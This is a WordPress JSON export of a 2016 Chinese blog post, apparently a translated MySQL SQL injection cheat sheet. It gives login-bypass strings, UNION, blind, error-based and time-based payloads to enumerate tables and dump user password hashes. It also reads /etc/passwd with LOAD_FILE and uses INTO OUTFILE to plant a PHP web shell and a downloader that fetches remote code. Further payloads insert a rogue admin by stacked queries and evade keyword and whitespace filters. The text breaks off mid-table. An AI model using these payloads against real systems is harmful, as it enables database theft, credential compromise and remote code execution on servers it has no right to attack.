{"id":439,"date":"2016-01-06T13:23:45","date_gmt":"2016-01-06T05:23:45","guid":{"rendered":"http:\/\/www.huike007.cn\/?p=439"},"modified":"2016-01-06T13:23:45","modified_gmt":"2016-01-06T05:23:45","slug":"mysql%e6%b3%a8%e5%85%a5%e7%a7%91%e6%99%ae","status":"publish","type":"post","link":"http:\/\/www.huike007.cn\/?p=439","title":{"rendered":"MySql\u6ce8\u5165\u79d1\u666e"},"content":{"rendered":"<h1 class=\"entry-title ng-binding\"><\/h1>\n<section class=\"entry-content ng-binding\">\n<h3>\u9ed8\u8ba4\u5b58\u5728\u7684\u6570\u636e\u5e93\uff1a<\/h3>\n<table>\n<tbody>\n<tr>\n<td>mysql<\/td>\n<td>\u9700\u8981root\u6743\u9650\u8bfb\u53d6<\/td>\n<\/tr>\n<tr>\n<td>information_schema<\/td>\n<td>\u57285\u4ee5\u4e0a\u7684\u7248\u672c\u4e2d\u5b58\u5728<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>\u6d4b\u8bd5\u662f\u5426\u5b58\u5728\u6ce8\u5165\u65b9\u6cd5<\/h3>\n<p>\u5047\uff1a\u8868\u793a\u67e5\u8be2\u662f\u9519\u8bef\u7684 (MySQL \u62a5\u9519\/\u8fd4\u56de\u9875\u9762\u4e0e\u539f\u6765\u4e0d\u540c)<br \/>\n\u771f\uff1a\u8868\u793a\u67e5\u8be2\u662f\u6b63\u5e38\u7684 (\u8fd4\u56de\u9875\u9762\u4e0e\u539f\u6765\u76f8\u540c)<br \/>\n<!--more-->\u5171\u4e09\u79cd\u60c5\u51b5\uff1a<\/p>\n<table>\n<tbody>\n<tr>\n<th>\u5b57\u7b26\u4e32\u7c7b\u578b\u67e5\u8be2\u65f6\uff1a<\/th>\n<th>\u6570\u5b57\u7c7b\u578b\u67e5\u8be2\u65f6\uff1a<\/th>\n<th>\u767b\u9646\u65f6\uff1a<\/th>\n<\/tr>\n<tr>\n<td>\n<table>\n<tbody>\n<tr>\n<td>&#8216;<\/td>\n<td>\u5047<\/td>\n<\/tr>\n<tr>\n<td>&#8221;<\/td>\n<td>\u771f<\/td>\n<\/tr>\n<tr>\n<td>&#8220;<\/td>\n<td>\u5047<\/td>\n<\/tr>\n<tr>\n<td>&#8220;&#8221;<\/td>\n<td>\u771f<\/td>\n<\/tr>\n<tr>\n<td>\\<\/td>\n<td>\u5047<\/td>\n<\/tr>\n<tr>\n<td>\\\\<\/td>\n<td>\u771f<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/td>\n<td>\n<table>\n<tbody>\n<tr>\n<td>AND 1<\/td>\n<td>\u771f<\/td>\n<\/tr>\n<tr>\n<td>AND 0<\/td>\n<td>\u5047<\/td>\n<\/tr>\n<tr>\n<td>AND true<\/td>\n<td>\u771f<\/td>\n<\/tr>\n<tr>\n<td>AND false<\/td>\n<td>\u5047<\/td>\n<\/tr>\n<tr>\n<td>1-false<\/td>\n<td>\u6709\u95ee\u9898\u65f6\u8fd4\u56de1\u7684\u7ed3\u679c<\/td>\n<\/tr>\n<tr>\n<td>1-true<\/td>\n<td>\u6709\u95ee\u9898\u65f6\u8fd4\u56de0\u7684\u7ed3\u679c<\/td>\n<\/tr>\n<tr>\n<td>2-1<\/td>\n<td>\u8fd4\u56de\u4e0e1\u76f8\u540c\u4ee3\u8868\u53ef\u80fd\u5b58\u5728\u95ee\u9898<\/td>\n<\/tr>\n<tr>\n<td>1*56<\/td>\n<td>\u8fd4\u56de\u4e0e56\u76f8\u540c\u4ee3\u8868\u53ef\u80fd\u5b58\u5728\u95ee\u9898<\/td>\n<\/tr>\n<tr>\n<td>1*56<\/td>\n<td>\u8fd4\u56de\u4e0e1\u76f8\u540c\u4ee3\u8868\u6ca1\u6709\u95ee\u9898<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/td>\n<td>\n<table>\n<tbody>\n<tr>\n<td>&#8216; OR &#8216;1<\/td>\n<\/tr>\n<tr>\n<td>&#8216; OR 1 &#8212; &#8211;<\/td>\n<\/tr>\n<tr>\n<td>&#8221; OR &#8220;&#8221; = &#8220;<\/td>\n<\/tr>\n<tr>\n<td>&#8221; OR 1 = 1 &#8212; &#8211;<\/td>\n<\/tr>\n<tr>\n<td>&#8216;=&#8217;<\/td>\n<\/tr>\n<tr>\n<td>&#8216;LIKE&#8217;<\/td>\n<\/tr>\n<tr>\n<td>&#8216;=0&#8211;+<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4f8b\u5b50:<\/p>\n<pre class=\"highlight\">SELECT * FROM Users WHERE id = '1''';\nSELECT * FROM Users WHERE id = 3-2;\nSELECT * FROM Users WHERE username = 'Mike' AND password = '' OR '' = '';\n<\/pre>\n<p>\u53ef\u4ee5\u4f7f\u7528\u5f88\u591a\u5355\u53cc\u5f15\u53f7\uff0c\u53ea\u8981\u662f\u6210\u5bf9\u51fa\u73b0\u3002<\/p>\n<pre class=\"highlight\">SELECT * FROM Articles WHERE id = '121'''''''''''''\n<\/pre>\n<p>\u5f15\u53f7\u540e\u7684\u8bed\u53e5\u4f1a\u7ee7\u7eed\u6267\u884c\u3002<\/p>\n<pre class=\"highlight\">SELECT '1'''''\"\" UNION SELECT '2' # 1 and 2\n<\/pre>\n<p>\u4e0b\u9762\u7684\u7b26\u53f7\u53ef\u4ee5\u7528\u6765\u6ce8\u91ca\u8bed\u53e5\uff1a<\/p>\n<table>\n<tbody>\n<tr>\n<td>#<\/td>\n<td>Hash \u8bed\u6cd5<\/td>\n<\/tr>\n<tr>\n<td>\/*<\/td>\n<td>C-style \u8bed\u6cd5<\/td>\n<\/tr>\n<tr>\n<td>&#8212; &#8211;<\/td>\n<td>SQL \u8bed\u6cd5<\/td>\n<\/tr>\n<tr>\n<td>;%00<\/td>\n<td>\u7a7a\u5b57\u8282<\/td>\n<\/tr>\n<tr>\n<td>`<\/td>\n<td>\u53cd\u5f15\u53f7<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">SELECT * FROM Users WHERE username = '' OR 1=1 -- -' AND password = '';\nSELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3`';\n<\/pre>\n<h3>\u6d4b\u8bd5\u6570\u636e\u5e93\u7248\u672c<\/h3>\n<pre class=\"highlight\">VERSION()\n@@VERSION\n@@GLOBAL.VERSION\n<\/pre>\n<p>\u5982\u679c\u7248\u672c\u4e3a5\u7684\u8bdd\uff0c\u4e0b\u9762\u4f8b\u5b50\u8fd4\u56de\u4e3a\u771f\uff1a<\/p>\n<pre class=\"highlight\">SELECT * FROM Users WHERE id = '1' AND MID(VERSION(),1,1) = '5';\n<\/pre>\n<p>windows\u5e73\u53f0\u4e0a\u7684mysql\u67e5\u8be2\u4e0elinux\u4e0a\u8fd4\u56de\u4e0d\u540c\uff0c\u5982\u679c\u662fwindows\u670d\u52a1\u5668\u8fd4\u56de\u7ed3\u679c\u4f1a\u5305\u542b -nt-log\u5b57\u7b26\u3002<\/p>\n<h3>\u6570\u636e\u5e93\u8ba4\u8bc1\u4fe1\u606f\uff1a<\/h3>\n<table>\n<tbody>\n<tr>\n<td>\u8868<\/td>\n<td>mysql.user<\/td>\n<\/tr>\n<tr>\n<td>\u5b57\u6bb5<\/td>\n<td>user, password<\/td>\n<\/tr>\n<tr>\n<td>\u5f53\u524d\u7528\u6237<\/td>\n<td>user(), current_user(), current_user, system_user(), session_user()<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">SELECT current_user;\nSELECT CONCAT_WS(0x3A, user, password) FROM mysql.user WHERE user = 'root'-- (Privileged)\n<\/pre>\n<h3>\u6570\u636e\u5e93\u540d\uff1a<\/h3>\n<table>\n<tbody>\n<tr>\n<td>\u8868<\/td>\n<td>information_schema.schemata, mysql.db<\/td>\n<\/tr>\n<tr>\n<td>\u5b57\u6bb5<\/td>\n<td>schema_name, db<\/td>\n<\/tr>\n<tr>\n<td>\u5f53\u524d\u6570\u636e\u5e93<\/td>\n<td>database(), schema()<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">SELECT database();\nSELECT schema_name FROM information_schema.schemata;\nSELECT DISTINCT(db) FROM mysql.db;-- (Privileged)\n<\/pre>\n<h3>\u670d\u52a1\u5668\u4e3b\u673a\u540d\uff1a<\/h3>\n<pre class=\"highlight\">@@HOSTNAME\n<\/pre>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">SELECT @@hostname;\n<\/pre>\n<h3>\u8868\u548c\u5b57\u6bb5<\/h3>\n<h4>\u68c0\u6d4b\u5b57\u6bb5\u6570<\/h4>\n<p>\u4e24\u79cd\u65b9\u5f0f\uff1a<\/p>\n<table>\n<tbody>\n<tr>\n<td>ORDER BY\u5224\u65ad<\/td>\n<td>ORDER BY n+1; \u8ba9n\u4e00\u76f4\u589e\u52a0\u76f4\u5230\u51fa\u73b0\u9519\u8bef\u9875\u9762\u3002 \u4f8b\u5b50: \u67e5\u8be2\u8bed\u53e5 SELECT username, password, permission FROM Users WHERE id = &#8216;1&#8217;; 1&#8242; ORDER BY 1&#8211;+ \u771f 1&#8242; ORDER BY 2&#8211;+ \u771f 1&#8242; ORDER BY 3&#8211;+ \u771f 1&#8242; ORDER BY 4&#8211;+ \u5047- \u67e5\u8be2\u53ea\u7528\u4e863\u4e2a\u5b57\u6bb5 -1&#8242; UNION SELECT 1,2,3&#8211;+ \u771f<\/td>\n<\/tr>\n<tr>\n<td>\u57fa\u4e8e\u9519\u8bef\u67e5\u8be2<\/td>\n<td>AND (SELECT * FROM SOME_EXISTING_TABLE) = 1 \u6ce8\u610f: \u8fd9\u79cd\u65b9\u5f0f\u9700\u8981\u4f60\u77e5\u9053\u6240\u8981\u67e5\u8be2\u7684\u8868\u540d\u3002 \u8fd9\u79cd\u62a5\u9519\u65b9\u5f0f\u8fd4\u56de\u8868\u7684\u5b57\u6bb5\u6570\uff0c\u800c\u4e0d\u662f\u9519\u8bef\u7684\u67e5\u8be2\u8bed\u53e5\u3002 \u4f8b\u5b50\uff1a \u67e5\u8be2\u8bed\u53e5 SELECT permission FROM Users WHERE id = 1; AND (SELECT * FROM Users) = 1 \u8fd4\u56deUsers\u7684\u5b57\u6bb5\u6570<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4>\u67e5\u8be2\u8868\u540d<\/h4>\n<p>\u4e09\u79cd\u65b9\u5f0f\uff1a<\/p>\n<table>\n<tbody>\n<tr>\n<td>Union\u65b9\u5f0f<\/td>\n<td>UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;&#8211; MySQL 4\u7248\u672c\u65f6\u7528version=9\uff0cMySQL 5\u7248\u672c\u65f6\u7528version=10<\/td>\n<\/tr>\n<tr>\n<td>\u76f2\u6ce8<\/td>\n<td>AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables &gt; &#8216;A&#8217;<\/td>\n<\/tr>\n<tr>\n<td>\u62a5\u9519<\/td>\n<td>AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM information_schema.tables LIMIT 1)));&#8211; \u57285.1.5\u7248\u672c\u4e2d\u6210\u529f\u3002<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4>\u67e5\u8be2\u5217\u540d<\/h4>\n<table>\n<tbody>\n<tr>\n<td>Union\u65b9\u5f0f<\/td>\n<td>UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = &#8216;tablename&#8217;<\/td>\n<\/tr>\n<tr>\n<td>\u76f2\u6ce8<\/td>\n<td>AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns &gt; &#8216;A&#8217;<\/td>\n<\/tr>\n<tr>\n<td>\u62a5\u9519<\/td>\n<td>AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1)));&#8211; \u57285.1.5\u7248\u672c\u4e2d\u6210\u529f\u3002 AND (1,2,3) = (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1)&#8211; MySQL 5.1\u7248\u672c\u4fee\u590d\u4e86<\/td>\n<\/tr>\n<tr>\n<td>\u5229\u7528PROCEDURE ANALYSE()<\/td>\n<td>\u8fd9\u4e2a\u9700\u8981web\u5c55\u793a\u9875\u9762\u6709\u4f60\u6240\u6ce8\u5165\u67e5\u8be2\u7684\u4e00\u4e2a\u5b57\u6bb5\u3002 \u4f8b\u5b50: \u67e5\u8be2\u8bed\u53e5 SELECT username, permission FROM Users WHERE id = 1; 1 PROCEDURE ANALYSE() \u83b7\u5f97\u7b2c\u4e00\u4e2a\u6bb5\u540d 1 LIMIT 1,1 PROCEDURE ANALYSE() \u83b7\u5f97\u7b2c\u4e8c\u4e2a\u6bb5\u540d 1 LIMIT 2,1 PROCEDURE ANALYSE() \u83b7\u5f97\u7b2c\u4e09\u4e2a\u6bb5\u540d<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4>\u4e00\u6b21\u67e5\u8be2\u591a\u4e2a\u8868\u6216\u5217<\/h4>\n<pre class=\"highlight\">SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema&amp;gt;=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] &amp;gt;',table_name,' &amp;gt; ',column_name))))x\n<\/pre>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">SELECT * FROM Users WHERE id = '-1' UNION SELECT 1, 2, (SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema&amp;gt;=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] &amp;gt;',table_name,' &amp;gt; ',column_name))))x), 4--+';\n<\/pre>\n<p>\u8f93\u51fa\u7ed3\u679c\uff1a<\/p>\n<pre class=\"highlight\"> [ information_schema ] &gt;CHARACTER_SETS &gt; CHARACTER_SET_NAME\n [ information_schema ] &gt;CHARACTER_SETS &gt; DEFAULT_COLLATE_NAME\n [ information_schema ] &gt;CHARACTER_SETS &gt; DESCRIPTION\n [ information_schema ] &gt;CHARACTER_SETS &gt; MAXLEN\n [ information_schema ] &gt;COLLATIONS &gt; COLLATION_NAME\n [ information_schema ] &gt;COLLATIONS &gt; CHARACTER_SET_NAME\n [ information_schema ] &gt;COLLATIONS &gt; ID\n [ information_schema ] &gt;COLLATIONS &gt; IS_DEFAULT\n [ information_schema ] &gt;COLLATIONS &gt; IS_COMPILED\n<\/pre>\n<p>\u5229\u7528\u4ee3\u7801\uff1a<\/p>\n<pre class=\"highlight\">SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROM information_schema.tables) SEPARATOR 0x3c62723e),1,1024) FROM information_schema.columns\n<\/pre>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">SELECT username FROM Users WHERE id = '-1' UNION SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROM information_schema.tables) SEPARATOR 0x3c62723e),1,1024) FROM information_schema.columns;\n<\/pre>\n<p>\u8f93\u51fa\u7ed3\u679c\uff1a<\/p>\n<pre class=\"highlight\">Table: talk_revisions\nColumn: revid\nTable: talk_revisions\nColumn: userid\nTable: talk_revisions\nColumn: user\nTable: talk_projects\nColumn: priority\n<\/pre>\n<h4>\u6839\u636e\u5217\u540d\u67e5\u8be2\u6240\u5728\u7684\u8868<\/h4>\n<table>\n<tbody>\n<tr>\n<td>SELECT table_name FROM information_schema.columns WHERE column_name = &#8216;username&#8217;;<\/td>\n<td>\u67e5\u8be2\u5b57\u6bb5\u4e3ausername\u7684\u8868<\/td>\n<\/tr>\n<tr>\n<td>SELECT table_name FROM information_schema.columns WHERE column_name LIKE &#8216;%user%&#8217;;<\/td>\n<td>\u67e5\u8be2\u5b57\u6bb5\u4e2d\u5305\u542buser\u7684\u8868<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4>\u6839\u636e\u8868\u67e5\u8be2\u5305\u542b\u7684\u5b57\u6bb5<\/h4>\n<table>\n<tbody>\n<tr>\n<td>SELECT column_name FROM information_schema.columns WHERE table_name = &#8216;Users&#8217;;<\/td>\n<td>\u67e5\u8be2user\u8868\u4e2d\u7684\u5b57\u6bb5<\/td>\n<\/tr>\n<tr>\n<td>SELECT column_name FROM information_schema.columns WHERE table_name LIKE &#8216;%user%&#8217;;<\/td>\n<td>\u67e5\u8be2\u5305\u542buser\u5b57\u7b26\u4e32\u8868\u4e2d\u7684\u5b57\u6bb5<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4>\u7ed5\u8fc7\u5f15\u53f7\u9650\u5236<\/h4>\n<table>\n<tbody>\n<tr>\n<td>SELECT * FROM Users WHERE username = 0x61646D696E<\/td>\n<td>Hex\u7f16\u7801<\/td>\n<\/tr>\n<tr>\n<td>SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)<\/td>\n<td>\u5229\u7528CHAR()\u51fd\u6570<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4>\u7ed5\u8fc7\u5b57\u7b26\u4e32\u9ed1\u540d\u5355<\/h4>\n<table>\n<tbody>\n<tr>\n<td>SELECT &#8216;a&#8217; &#8216;d&#8217; &#8216;mi&#8217; &#8216;n&#8217;;<\/td>\n<\/tr>\n<tr>\n<td>SELECT CONCAT(&#8216;a&#8217;, &#8216;d&#8217;, &#8216;m&#8217;, &#8216;i&#8217;, &#8216;n&#8217;);<\/td>\n<\/tr>\n<tr>\n<td>SELECT CONCAT_WS(&#8221;, &#8216;a&#8217;, &#8216;d&#8217;, &#8216;m&#8217;, &#8216;i&#8217;, &#8216;n&#8217;);<\/td>\n<\/tr>\n<tr>\n<td>SELECT GROUP_CONCAT(&#8216;a&#8217;, &#8216;d&#8217;, &#8216;m&#8217;, &#8216;i&#8217;, &#8216;n&#8217;);<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4f7f\u7528CONCAT()\u65f6\uff0c\u4efb\u4f55\u4e2a\u53c2\u6570\u4e3anull\uff0c\u5c06\u8fd4\u56denull\uff0c \u63a8\u8350\u4f7f\u7528CONCAT_WS() \u3002<br \/>\nCONCAT_WS() \u51fd\u6570\u7b2c\u4e00\u4e2a\u53c2\u6570\u8868\u793a\u7528\u54ea\u4e2a\u5b57\u7b26\u95f4\u9694\u6240\u67e5\u8be2\u7684\u7ed3\u679c\u3002<\/p>\n<h4>\u6761\u4ef6\u8bed\u53e5<\/h4>\n<table>\n<tbody>\n<tr>\n<td>CASE<\/td>\n<\/tr>\n<tr>\n<td>IF()<\/td>\n<\/tr>\n<tr>\n<td>IFNULL()<\/td>\n<\/tr>\n<tr>\n<td>NULLIF()<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">SELECT IF(1=1, true, false);\nSELECT CASE WHEN 1=1 THEN true ELSE false END;\n<\/pre>\n<h4>\u65f6\u95f4\u5ef6\u8fdf\u67e5\u8be2\uff1a<\/h4>\n<table>\n<tbody>\n<tr>\n<td>SLEEP()<\/td>\n<td>MySQL 5<\/td>\n<\/tr>\n<tr>\n<td>BENCHMARK()<\/td>\n<td>MySQL 4\/5<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">' - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('true')), false)) - '\n<\/pre>\n<h3>\u6743\u9650<\/h3>\n<h4>\u6587\u4ef6\u6743\u9650<\/h4>\n<p>\u4e0b\u9762\u7684\u8bed\u53e5\u53ef\u4ee5\u67e5\u8be2\u7528\u6237\u8bfb\u5199\u6587\u4ef6\u64cd\u4f5c\u6743\u9650\uff1a<\/p>\n<table>\n<tbody>\n<tr>\n<td>SELECT file_priv FROM mysql.user WHERE user = &#8216;username&#8217;;<\/td>\n<td>\u9700\u8981root\u7528\u6237\u6765\u6267\u884c<\/td>\n<td>MySQL 4\/5<\/td>\n<\/tr>\n<tr>\n<td>SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = &#8216;file&#8217; AND grantee like &#8216;%username%&#8217;;<\/td>\n<td>\u666e\u901a\u7528\u6237\u90fd\u53ef\u4ee5<\/td>\n<td>MySQL 5<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4>\u8bfb\u53d6\u6587\u4ef6<\/h4>\n<p>\u5982\u679c\u7528\u6237\u6709\u6587\u4ef6\u64cd\u4f5c\u6743\u9650\u53ef\u4ee5\u8bfb\u53d6\u6587\u4ef6\uff1a<\/p>\n<pre class=\"highlight\">LOAD_FILE()\n<\/pre>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">SELECT LOAD_FILE('\/etc\/passwd');\nSELECT LOAD_FILE(0x2F6574632F706173737764);\n<\/pre>\n<ul>\n<li>\u6587\u4ef6\u5fc5\u987b\u5728\u670d\u52a1\u5668\u4e0a\u3002<\/li>\n<li>LOAD_FILE()\u51fd\u6570\u64cd\u4f5c\u6587\u4ef6\u7684\u5f53\u524d\u76ee\u5f55\u662f@@datadir \u3002<\/li>\n<li>MySQL\u7528\u6237\u5fc5\u987b\u62e5\u6709\u5bf9\u6b64\u6587\u4ef6\u8bfb\u53d6\u7684\u6743\u9650\u3002<\/li>\n<li>\u6587\u4ef6\u5927\u5c0f\u5fc5\u987b\u5c0f\u4e8e max_allowed_packet\u3002<\/li>\n<li>@@max_allowed_packet\u7684\u9ed8\u8ba4\u5927\u5c0f\u662f1047552 \u5b57\u8282.<\/li>\n<\/ul>\n<h4>\u5199\u6587\u4ef6<\/h4>\n<p>\u5982\u679c\u7528\u6237\u6709\u6587\u4ef6\u64cd\u4f5c\u6743\u9650\u53ef\u4ee5\u5199\u6587\u4ef6\u3002<\/p>\n<pre class=\"highlight\">INTO OUTFILE\/DUMPFILE\n<\/pre>\n<p>\u5199\u4e00\u4e2aphp\u7684shell\uff1a<\/p>\n<pre class=\"highlight\">SELECT '&lt;? system($_GET[\\'c\\']); ?&gt;' INTO OUTFILE '\/var\/www\/shell.php';\n<\/pre>\n<p>\u8bbf\u95ee\u5982\u4e0b\u94fe\u63a5\uff1a<br \/>\nhttp:\/\/localhost\/shell.php?c=cat%20\/etc\/passwd<br \/>\n\u5199\u4e00\u4e2a\u4e0b\u8f7d\u8005\uff1a<\/p>\n<pre class=\"highlight\">SELECT '&lt;? fwrite(fopen($_GET[f], \\'w\\'), file_get_contents($_GET[u])); ?&gt;' INTO OUTFILE '\/var\/www\/get.php'\n<\/pre>\n<p>\u8bbf\u95ee\u5982\u4e0b\u94fe\u63a5\uff1a<br \/>\nhttp:\/\/localhost\/get.php?f=shell.php&#038;u=http:\/\/localhost\/c99.txt<\/p>\n<ul>\n<li>INTO OUTFILE \u4e0d\u53ef\u4ee5\u8986\u76d6\u5df2\u5b58\u5728\u7684\u6587\u4ef6\u3002<\/li>\n<li>INTO OUTFILE \u5fc5\u987b\u662f\u6700\u540e\u4e00\u4e2a\u67e5\u8be2\u3002<\/li>\n<li>\u5f15\u53f7\u662f\u5fc5\u987b\u7684\uff0c\u56e0\u4e3a\u6ca1\u6709\u529e\u6cd5\u53ef\u4ee5\u7f16\u7801\u8def\u5f84\u540d\u3002<\/li>\n<\/ul>\n<h4>PDO\u5806\u67e5\u8be2\u65b9\u5f0f\u64cd\u4f5c\u6570\u636e\u5e93<\/h4>\n<p>PHP\u4f7f\u7528PDO_MYSQL\u6765\u8fde\u63a5\u6570\u636e\u5e93\uff0c\u4fbf\u53ef\u4ee5\u4f7f\u7528\u5806\u67e5\u8be2\uff0c\u5806\u67e5\u8be2\u53ef\u4ee5\u540c\u65f6\u6267\u884c\u591a\u4e2a\u8bed\u53e5\u3002<\/p>\n<pre class=\"highlight\">SELECT * FROM Users WHERE ID=1 AND 1=0; INSERT INTO Users(username,password,priv) VALUES ('BobbyTables', 'kl20da$$','admin');\n<\/pre>\n<h4>MySql\u7279\u6709\u7684\u5199\u6cd5<\/h4>\n<p>MySql\u4e2d\uff0c\/*! SQL \u8bed\u53e5 *\/ \u8fd9\u79cd\u683c\u5f0f\u91cc\u9762\u7684 SQL \u8bed\u53e5\u4f1a\u5f53\u6b63\u5e38\u7684\u8bed\u53e5\u4e00\u6837\u88ab\u89e3\u6790\u3002<br \/>\n\u5982\u679c\u5728!\u4e4b\u540e\u662f\u4e00\u4e32\u6570\u5b57(\u8fd9\u4e32\u6570\u5b57\u5c31\u662f mysql \u6570\u636e\u5e93\u7684\u7248\u672c\u53f7), \u5982\uff1a\/*! 12345 SQL \u8bed\u53e5 *\/<br \/>\n\u5f53\u7248\u672c\u53f7\u5927\u4e8e\u7b49\u4e8e\u8be5\u6570\u5b57,SQL \u8bed\u53e5\u5219\u6267\u884c,\u5426\u5219\u5c31\u4e0d\u6267\u884c\u3002<\/p>\n<pre class=\"highlight\">SELECT 1\/*!41320UNION\/*!\/*!\/*!00000SELECT\/*!\/*!USER\/*!(\/*!\/*!\/*!*\/);\n<\/pre>\n<h3>\u6a21\u7cca\u548c\u6df7\u6dc6<\/h3>\n<h4>\u5141\u8bb8\u7684\u5b57\u7b26<\/h4>\n<table>\n<tbody>\n<tr>\n<td>09<\/td>\n<td>Horizontal Tab<\/td>\n<\/tr>\n<tr>\n<td>0A<\/td>\n<td>New Line<\/td>\n<\/tr>\n<tr>\n<td>0B<\/td>\n<td>Vertical Tab<\/td>\n<\/tr>\n<tr>\n<td>0C<\/td>\n<td>New Page<\/td>\n<\/tr>\n<tr>\n<td>0D<\/td>\n<td>Carriage Return<\/td>\n<\/tr>\n<tr>\n<td>A0<\/td>\n<td>Non-breaking Space<\/td>\n<\/tr>\n<tr>\n<td>20<\/td>\n<td>Space<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">'%0A%09UNION%0CSELECT%A0NULL%20%23\n<\/pre>\n<p>\u62ec\u53f7\u4e5f\u53ef\u4ee5\u7528\u6765\u7ed5\u8fc7\u8fc7\u6ee4\u7a7a\u683c\u7684\u60c5\u51b5\uff1a<\/p>\n<table>\n<tbody>\n<tr>\n<td>28<\/td>\n<td>(<\/td>\n<\/tr>\n<tr>\n<td>29<\/td>\n<td>)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">UNION(SELECT(column)FROM(table))\n<\/pre>\n<h4>AND\u6216OR\u540e\u9762\u53ef\u4ee5\u8ddf\u7684\u5b57\u7b26<\/h4>\n<table>\n<tbody>\n<tr>\n<td>20<\/td>\n<td>Space<\/td>\n<\/tr>\n<tr>\n<td>2B<\/td>\n<td>+<\/td>\n<\/tr>\n<tr>\n<td>2D<\/td>\n<td>&#8211;<\/td>\n<\/tr>\n<tr>\n<td>7E<\/td>\n<td>~<\/td>\n<\/tr>\n<tr>\n<td>21<\/td>\n<td>!<\/td>\n<\/tr>\n<tr>\n<td>40<\/td>\n<td>@<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"highlight\">SELECT 1 FROM dual WHERE 1=1 AND-+-+-+-+~~((1))\n<\/pre>\n<p>dual\u662f\u4e00\u4e2a\u865a\u62df\u8868\uff0c\u53ef\u4ee5\u7528\u6765\u505a\u6d4b\u8bd5\u3002<\/p>\n<h3>\u51e0\u4e2a\u9488\u5bf9\u9ed1\u540d\u5355\u7ed5\u8fc7\u7684\u4f8b\u5b50<\/h3>\n<h4>\u57fa\u4e8e\u5173\u952e\u5b57\u7684\u9ed1\u540d\u5355<\/h4>\n<table>\n<tbody>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and or<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or)\/i&#8217;,$id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>1 or 1=1 1 and 1=1<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1 || 1=1 1 &amp;&amp; 